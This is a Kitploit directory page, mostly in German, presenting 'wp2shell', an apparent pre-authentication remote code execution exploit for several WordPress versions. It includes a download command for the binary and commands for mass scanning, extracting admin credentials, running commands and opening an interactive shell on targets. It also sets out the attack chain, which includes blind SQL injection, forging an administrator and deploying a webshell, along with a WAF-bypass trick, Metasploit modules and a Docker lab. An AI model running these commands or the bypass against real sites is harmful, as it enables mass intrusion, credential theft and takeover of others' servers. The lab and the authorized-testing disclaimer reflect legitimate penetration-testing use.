Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
wp2shell-Exploit-Waf-Bypass — WordPress-Pre-Auth-RCE-Exploit + Scanner + WAF-Bypass | CVE-2026-63030 + CVE-2026-60137 | Go + Python + Metasploit-Module + Docker-Lab | Kitploit
Tools/GitHubGitHub/m4xsec/wp2shell-exploit-waf-bypass
Web-SchwachstellenscannerExploitationWebanwendungs-ExploitationAPI-SicherheitstestsWAF-UmgehungPenetrationstestsRed Teaming
GitHubm4xsec/wp2shell-exploit-waf-bypass

wp2shell-Exploit-Waf-Bypass

WordPress-Pre-Auth-RCE-Exploit + Scanner + WAF-Bypass | CVE-2026-63030 + CVE-2026-60137 | Go + Python + Metasploit-Module + Docker-Lab

Repository anzeigen
213vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
root@kitploit:~
                ___      __         ___
 _      _____  |__ \ ___/ /_  ___  / / /
| | /| / / _ \ __/ // __/ __ \/ _ \/ / / 
| |/ |/ /  __// __//_  / / / /  __/ / /  
|__/|__/\___//____//__/_/ /_/\___/_/_/   
                                         
  WordPress Pre-Auth RCE — CVE-2026-63030 + CVE-2026-60137
  by Venexy (M4xSec)

GitHub Release License: MIT Go Metasploit

Nicht authentifizierte Remote-Codeausführung auf WordPress 6.8.0–6.8.5, 6.9.0–6.9.4, 7.0.0–7.0.1. Behoben in 6.8.6, 6.9.5, 7.0.2.

Schnellinstallation

root@kitploit:~
# Pre-compiled binary (fastest)
curl -sL https://github.com/M4xSec/wp2shell-Exploit-Waf-Bypass/releases/download/v1.0.0/wp2shell-linux-amd64 -o wp2shell && chmod +x wp2shell

# Or build from source
go build -o wp2shell go-scanner/wp2shell-master.go

Angriffskette

  1. Routen-Verwirrung über verschachtelte Batch-Anfragen mit ungültigem Primer-Pfad umgeht die Authentifizierung
  2. Zeitbasierte blinde SQLi extrahiert Tabellenpräfix, Admin-ID und Anmeldedaten
  3. UNION-basierte Zeilenfälschung füttert oEmbed-Caches (nur lesbare SQLi → DB-Schreibvorgänge)
  4. Changeset-Erhöhung + reentrantes parse_request() fälscht einen Administrator
  5. Plugin-Upload stellt eine sich selbst bereinigende Webshell bereit
  6. Befehlsausführung und automatische Bereinigung

Werkzeuge

Go-Scanner (go-scanner/wp2shell-master.go)

All-in-One-Binärdatei – Scan, Check, Read, Exploit, interaktive Shell.

root@kitploit:~
go build -o wp2shell-master go-scanner/wp2shell-master.go

# Mass scan
./wp2shell-master scan -f targets.txt -j -t 20

# Confirm SQLi
./wp2shell-master check https://target.com --waf --delay 3.0

# Extract admin creds
./wp2shell-master read https://target.com --preset users

# Pre-auth RCE (no password needed)
./wp2shell-master rce https://target.com --cmd id -y --waf --stealth

# Interactive shell
./wp2shell-master rce https://target.com -i -y

WAF-Bypass-Tools (waf-bypass/)

Eigenständige Skripte für den Cloudflare/ModSecurity-Bypass per JSON-Unicode-Escaping von SQL-Schlüsselwörtern.

  • core.py — Gemeinsame Engine für blinde SQLi mit WAF-Bypass
  • dump_version.py — Extrahiert @@version
  • dump_dbname.py — Extrahiert DATABASE()
  • dump_tables.py — Listet Tabellen auf
  • dump_columns.py — Listet Spalten auf
  • rce_shell.py — Vollständige RCE-Kette mit WAF-Bypass

Metasploit-Module (metasploit-modules/)

  • wp2shell_rce.rb — Vollständiges RCE-Exploit-Modul (PR #21760)
  • wp2shell_scanner.rb — Nicht-destruktiver Scanner (PR #21761)

Lokal installieren:

root@kitploit:~
mkdir -p ~/.msf4/modules/exploits/multi/http
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp metasploit-modules/wp2shell_rce.rb ~/.msf4/modules/exploits/multi/http/wp_wordpress_batch_rce.rb
cp metasploit-modules/wp2shell_scanner.rb ~/.msf4/modules/auxiliary/scanner/http/wp_wordpress_batch_sqli.rb

WAF-Bypass-Technik

Die Cloudflare-WAF prüft rohe JSON-Bytes, dekodiert aber \uXXXX-Escape-Sequenzen vor dem Pattern-Matching nicht. WordPress' PHP json_decode() dekodiert sie transparent.

  • SLEEP → SLEEP — umgeht die Schlüsselwort-Erkennung
  • Doppelpunkt-Primer (: statt http://:) – kürzer, umgeht URI-Muster-Regeln
  • /wp-json/batch/v1 Permalink-Pfad – vermeidet Blockierung über ?rest_route=
  • Origin- und Referer-Header von der Zieldomäne – erfüllt CORS-/Same-Origin-Prüfungen

Docker-Labor

No-WAF-Labor (Port 8888)

root@kitploit:~
cd lab
docker compose up -d --build
# WordPress 6.9.0 at http://localhost:8888
# Admin: admin / Summer2026!

WAF-Labor (Port 9999)

ModSecurity CRS (OWASP) mit Cloudflare-artigen Regeln – Unicode-Bypass bestätigt.

root@kitploit:~
cd lab/waf
docker compose up -d --build
# WordPress behind WAF at http://localhost:9999

Haftungsausschluss

Dieses Tool dient ausschließlich autorisierten Sicherheitstests. Verwenden Sie es nur gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben. Unbefugter Zugriff ist illegal.

Lizenz

MIT

Tool herunterladen